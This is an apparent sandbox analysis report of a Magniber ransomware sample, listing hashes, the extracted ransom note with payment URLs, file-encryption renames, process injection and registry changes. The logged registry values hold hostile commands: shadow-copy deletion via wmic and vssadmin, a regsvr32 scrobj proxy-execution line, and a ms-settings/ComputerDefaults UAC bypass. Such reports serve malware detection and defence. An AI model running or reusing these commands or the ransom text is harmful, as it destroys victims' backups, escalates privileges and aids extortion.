magniber | 1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367

Analysis

max time kernel
144s
max time network
121s
platform
windows10_x64
resource
win10-en-20211104
submitted
24-11-2021 15:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Size

22KB
MD5

7906dc475a8ae55ffb5af7fd3ac8f10a
SHA1

e7304e2436dc0eddddba229f1ec7145055030151
SHA256

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
SHA512

c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://8c141288125852d07eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://8c141288125852d07eltalkfzj.jobsbig.cam/eltalkfzj http://8c141288125852d07eltalkfzj.boxgas.icu/eltalkfzj http://8c141288125852d07eltalkfzj.sixsees.club/eltalkfzj http://8c141288125852d07eltalkfzj.nowuser.casa/eltalkfzj Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://8c141288125852d07eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj

http://8c141288125852d07eltalkfzj.jobsbig.cam/eltalkfzj

http://8c141288125852d07eltalkfzj.boxgas.icu/eltalkfzj

http://8c141288125852d07eltalkfzj.sixsees.club/eltalkfzj

http://8c141288125852d07eltalkfzj.nowuser.casa/eltalkfzj

Signatures

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2732	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3088	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1932	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	772	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4116	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4132	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4124	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4320	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4420	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4312	2500	cmd.exe	94
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4196	2500	cmd.exe	94

Modifies extensions of user files 8 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

sihost.exe

description	ioc	Process
File renamed	C:\Users\Admin\Pictures\AssertStop.raw => C:\Users\Admin\Pictures\AssertStop.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\RemoveConvertTo.raw => C:\Users\Admin\Pictures\RemoveConvertTo.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\WriteOpen.raw => C:\Users\Admin\Pictures\WriteOpen.raw.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\DismountStep.png => C:\Users\Admin\Pictures\DismountStep.png.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\SelectDisconnect.png => C:\Users\Admin\Pictures\SelectDisconnect.png.eltalkfzj	sihost.exe
File opened for modification	C:\Users\Admin\Pictures\StopInitialize.tiff	sihost.exe
File renamed	C:\Users\Admin\Pictures\StopInitialize.tiff => C:\Users\Admin\Pictures\StopInitialize.tiff.eltalkfzj	sihost.exe
File renamed	C:\Users\Admin\Pictures\UpdateShow.png => C:\Users\Admin\Pictures\UpdateShow.png.eltalkfzj	sihost.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

description	pid	Process	procid_target
PID 3452 set thread context of 2620	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	11
PID 3452 set thread context of 2636	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	10
PID 3452 set thread context of 2872	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	9
PID 3452 set thread context of 3048	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	8
PID 3452 set thread context of 3432	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	25
PID 3452 set thread context of 3708	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	24

Program crash 1 IoCs

Processes:

WerFault.exe

pid	pid_target	Process	procid_target
1284	3708	WerFault.exe	24

Modifies registry class 29 IoCs

Processes:

sihost.exetaskhostw.exesvchost.exeExplorer.EXE1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeRuntimeBroker.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	taskhostw.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Explorer.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	sihost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	taskhostw.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhostw.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0"	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	sihost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:C:\\Users\\Public\\readme.txt"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\ms-settings\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	svchost.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

Processes:

notepad.exe

pid	Process
1000	notepad.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exeWerFault.exe

pid	Process
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe
1284	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid	Process
3048	Explorer.EXE

Suspicious behavior: MapViewOfSection 6 IoCs

Processes:

1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

pid	Process
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WerFault.exeExplorer.EXEWMIC.exeWMIC.exe

description	pid	Process
Token: SeDebugPrivilege	1284	WerFault.exe
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeShutdownPrivilege	3048	Explorer.EXE
Token: SeCreatePagefilePrivilege	3048	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	344	WMIC.exe
Token: SeSecurityPrivilege	344	WMIC.exe
Token: SeTakeOwnershipPrivilege	344	WMIC.exe
Token: SeLoadDriverPrivilege	344	WMIC.exe
Token: SeSystemProfilePrivilege	344	WMIC.exe
Token: SeSystemtimePrivilege	344	WMIC.exe
Token: SeProfSingleProcessPrivilege	344	WMIC.exe
Token: SeIncBasePriorityPrivilege	344	WMIC.exe
Token: SeCreatePagefilePrivilege	344	WMIC.exe
Token: SeBackupPrivilege	344	WMIC.exe
Token: SeRestorePrivilege	344	WMIC.exe
Token: SeShutdownPrivilege	344	WMIC.exe
Token: SeDebugPrivilege	344	WMIC.exe
Token: SeSystemEnvironmentPrivilege	344	WMIC.exe
Token: SeRemoteShutdownPrivilege	344	WMIC.exe
Token: SeUndockPrivilege	344	WMIC.exe
Token: SeManageVolumePrivilege	344	WMIC.exe
Token: 33	344	WMIC.exe
Token: 34	344	WMIC.exe
Token: 35	344	WMIC.exe
Token: 36	344	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3120	WMIC.exe
Token: SeSecurityPrivilege	3120	WMIC.exe
Token: SeTakeOwnershipPrivilege	3120	WMIC.exe
Token: SeLoadDriverPrivilege	3120	WMIC.exe
Token: SeSystemProfilePrivilege	3120	WMIC.exe
Token: SeSystemtimePrivilege	3120	WMIC.exe
Token: SeProfSingleProcessPrivilege	3120	WMIC.exe
Token: SeIncBasePriorityPrivilege	3120	WMIC.exe
Token: SeCreatePagefilePrivilege	3120	WMIC.exe
Token: SeBackupPrivilege	3120	WMIC.exe
Token: SeRestorePrivilege	3120	WMIC.exe
Token: SeShutdownPrivilege	3120	WMIC.exe
Token: SeDebugPrivilege	3120	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3120	WMIC.exe
Token: SeRemoteShutdownPrivilege	3120	WMIC.exe
Token: SeUndockPrivilege	3120	WMIC.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
3048	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

sihost.exesvchost.execmd.exeExplorer.EXEcmd.execmd.exetaskhostw.execmd.exeRuntimeBroker.execmd.exe1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2620 wrote to memory of 1000	2620	sihost.exe	70
PID 2620 wrote to memory of 1000	2620	sihost.exe	70
PID 2620 wrote to memory of 2420	2620	sihost.exe	71
PID 2620 wrote to memory of 2420	2620	sihost.exe	71
PID 2620 wrote to memory of 1412	2620	sihost.exe	73
PID 2620 wrote to memory of 1412	2620	sihost.exe	73
PID 2620 wrote to memory of 860	2620	sihost.exe	77
PID 2620 wrote to memory of 860	2620	sihost.exe	77
PID 2636 wrote to memory of 2756	2636	svchost.exe	78
PID 2636 wrote to memory of 2756	2636	svchost.exe	78
PID 2636 wrote to memory of 3884	2636	svchost.exe	79
PID 2636 wrote to memory of 3884	2636	svchost.exe	79
PID 860 wrote to memory of 344	860	cmd.exe	82
PID 860 wrote to memory of 344	860	cmd.exe	82
PID 3048 wrote to memory of 1188	3048	Explorer.EXE	83
PID 3048 wrote to memory of 1188	3048	Explorer.EXE	83
PID 3048 wrote to memory of 1764	3048	Explorer.EXE	86
PID 3048 wrote to memory of 1764	3048	Explorer.EXE	86
PID 1412 wrote to memory of 3120	1412	cmd.exe	87
PID 1412 wrote to memory of 3120	1412	cmd.exe	87
PID 3884 wrote to memory of 352	3884	cmd.exe	88
PID 3884 wrote to memory of 352	3884	cmd.exe	88
PID 2872 wrote to memory of 2352	2872	taskhostw.exe	89
PID 2872 wrote to memory of 2352	2872	taskhostw.exe	89
PID 2872 wrote to memory of 3236	2872	taskhostw.exe	90
PID 2872 wrote to memory of 3236	2872	taskhostw.exe	90
PID 2756 wrote to memory of 1792	2756	cmd.exe	93
PID 2756 wrote to memory of 1792	2756	cmd.exe	93
PID 3432 wrote to memory of 2772	3432	RuntimeBroker.exe	95
PID 3432 wrote to memory of 2772	3432	RuntimeBroker.exe	95
PID 3432 wrote to memory of 4044	3432	RuntimeBroker.exe	96
PID 3432 wrote to memory of 4044	3432	RuntimeBroker.exe	96
PID 1764 wrote to memory of 3732	1764	cmd.exe	98
PID 1764 wrote to memory of 3732	1764	cmd.exe	98
PID 3452 wrote to memory of 1064	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	100
PID 3452 wrote to memory of 1064	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	100
PID 1188 wrote to memory of 2156	1188	cmd.exe	101
PID 1188 wrote to memory of 2156	1188	cmd.exe	101
PID 3452 wrote to memory of 2272	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	105
PID 3452 wrote to memory of 2272	3452	1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe	105
PID 3236 wrote to memory of 1476	3236	cmd.exe	102
PID 3236 wrote to memory of 1476	3236	cmd.exe	102
PID 4044 wrote to memory of 2592	4044	cmd.exe	106
PID 4044 wrote to memory of 2592	4044	cmd.exe	106
PID 2352 wrote to memory of 2560	2352	cmd.exe	107
PID 2352 wrote to memory of 2560	2352	cmd.exe	107
PID 2772 wrote to memory of 3956	2772	cmd.exe	108
PID 2772 wrote to memory of 3956	2772	cmd.exe	108
PID 2272 wrote to memory of 3792	2272	cmd.exe	109
PID 2272 wrote to memory of 3792	2272	cmd.exe	109
PID 1064 wrote to memory of 916	1064	cmd.exe	110
PID 1064 wrote to memory of 916	1064	cmd.exe	110
PID 3088 wrote to memory of 4232	3088	cmd.exe	134
PID 3088 wrote to memory of 4232	3088	cmd.exe	134
PID 2732 wrote to memory of 4244	2732	cmd.exe	126
PID 2732 wrote to memory of 4244	2732	cmd.exe	126
PID 1932 wrote to memory of 4276	1932	cmd.exe	127
PID 1932 wrote to memory of 4276	1932	cmd.exe	127
PID 772 wrote to memory of 4492	772	cmd.exe	137
PID 772 wrote to memory of 4492	772	cmd.exe	137
PID 4196 wrote to memory of 4580	4196	cmd.exe	139
PID 4196 wrote to memory of 4580	4196	cmd.exe	139
PID 4312 wrote to memory of 4612	4312	cmd.exe	140
PID 4312 wrote to memory of 4612	4312	cmd.exe	140

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
  "C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3452
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:916
- - C:\Windows\SYSTEM32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2272
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:3792
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1188
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2156
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3732

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2872
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2560
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3236
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2636
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2756
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1792
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:352

c:\windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2620
- \??\c:\windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1000
- \??\c:\windows\system32\cmd.exe
  cmd /c "start http://8c141288125852d07eltalkfzj.jobsbig.cam/eltalkfzj^&1^&45768267^&81^&335^&2215063"
  2⤵
  PID:2420
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3120
- \??\c:\windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:860
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:344

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3708
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3708 -s 812
  2⤵
  - Program crash
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1284

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3432
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2772
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3956
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4044
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2592

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2732
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4244

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3088
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4232

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1932
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4276

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:772
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4492

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4116
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4660

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4132
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4644

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4124
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4628

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:4204
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4676

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
